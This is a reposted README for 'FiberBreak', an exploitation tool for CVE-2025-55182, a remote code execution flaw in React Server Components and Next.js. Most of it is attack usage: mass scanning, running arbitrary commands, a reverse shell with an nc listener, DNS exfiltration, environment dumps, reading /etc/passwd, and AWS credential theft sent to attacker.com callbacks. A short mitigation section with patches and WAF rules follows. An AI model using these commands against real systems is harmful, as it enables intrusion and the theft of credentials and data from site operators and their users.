Share
## https://sploitus.com/exploit?id=8D87001C-F0E9-5F5A-9158-F691F9ED516F
# FiberBreak
Exploitation tool for CVE-2025-55182 (React2Shell) - Critical RCE in React Server Components.
## Overview
- **CVE**: CVE-2025-55182
- **CVSS**: 10.0 (CRITICAL)
- **Type**: Remote Code Execution (RCE)
- **Affected**: React 19.0-19.2.0, Next.js 15.x/16.x
## Installation
```bash
pip install -r requirements.txt
chmod +x fiberbreak.py
```
## Usage
### Detection
```bash
# Single target
./fiberbreak.py -u https://target.com detect
# Multiple targets
./fiberbreak.py -l targets.txt detect --threads 20
# Save results
./fiberbreak.py -l targets.txt detect -o results.json
```
### Exploitation
```bash
# Simple command
./fiberbreak.py -u https://target.com exploit -c "whoami"
# Reverse shell
./fiberbreak.py -u https://target.com exploit -c "10.10.10.10:4444" -t reverse_shell
# DNS exfiltration
./fiberbreak.py -u https://target.com exploit -c "whoami:attacker.oastify.com" -t dns_exfil
# Environment dump
./fiberbreak.py -u https://target.com exploit -c "https://attacker.com/exfil" -t env_dump
# File read
./fiberbreak.py -u https://target.com exploit -c "/etc/passwd:https://attacker.com" -t file_read
# AWS metadata
./fiberbreak.py -u https://target.com exploit -c "https://attacker.com/aws" -t aws_metadata
# System recon
./fiberbreak.py -u https://target.com exploit -c "https://attacker.com/recon" -t recon
```
### Impact Assessment
```bash
# Run tests
./fiberbreak.py -u https://target.com assess --callback https://attacker.com
# Save report
./fiberbreak.py -u https://target.com assess --callback https://attacker.com -o report.json
```
## Payload Types
| Type | Format | Description |
|------|--------|-------------|
| `simple` | `command` | Execute any command |
| `reverse_shell` | `lhost:lport` | Bash reverse shell |
| `dns_exfil` | `data:domain` | DNS exfiltration |
| `file_read` | `file:callback` | Read and exfiltrate file |
| `env_dump` | `callback` | Dump environment vars |
| `aws_metadata` | `callback` | AWS IAM credentials |
| `recon` | `callback` | System reconnaissance |
| `stealth_beacon` | `domain` | DNS beacon (no HTTP) |
## Examples
```bash
# DNS beacon - no system impact
./fiberbreak.py -u https://target.com exploit \
-c "attacker.oastify.com" -t stealth_beacon
```
### Penetration Testing
```bash
# 1. Detect
./fiberbreak.py -u https://target.com detect
# 2. Assess impact
./fiberbreak.py -u https://target.com assess --callback https://callback.com
# 3. Get shell
# Start listener: nc -lvnp 4444
./fiberbreak.py -u https://target.com exploit \
-c "10.10.10.10:4444" -t reverse_shell
```
### Mass Scanning
```bash
# Create targets.txt
echo "https://app1.target.com" > targets.txt
echo "https://app2.target.com" >> targets.txt
# Scan all
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json
# View vulnerable targets
cat scan_results.json | jq '.[] | select(.vulnerable==true)'
```
## Mitigation
### Patch Immediately
```bash
# React
npm install react@19.1.2 react-dom@19.1.2
# Next.js
npm install next@15.1.6 # or next@16.0.1
```
### WAF Rules
```nginx
# nginx
if ($http_next_action) {
return 403;
}
```
```apache
# ModSecurity
SecRule REQUEST_HEADERS:Next-Action "@rx ." \
"id:2025551820,phase:2,deny,status:403"
```
## Technical Details
**Vulnerability**: Unsafe deserialization in React Server Components Flight protocol. The server doesn't validate incoming payloads, allowing attackers to craft malicious Chunk objects that trigger RCE through Function() constructor gadgets.
**Root Cause**: Missing input validation in `decodeReply()` function, allowing arbitrary object injection during promise resolution.
**Attack Vector**: Send crafted multipart/form-data with `Next-Action` header to any RSC endpoint.
## References
- [NVD CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Wiz Research](https://www.wiz.io/blog/nextjs-cve-2025-55182-react2shell-deep-dive)
- [OffSec Analysis](https://www.offsec.com/blog/cve-2025-55182/)
## Legal Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED USE ONLY**
Unauthorized use of this tool is illegal. Only use on systems where you have explicit authorization. The author is not responsible for misuse.
## License
MIT License - Educational purposes only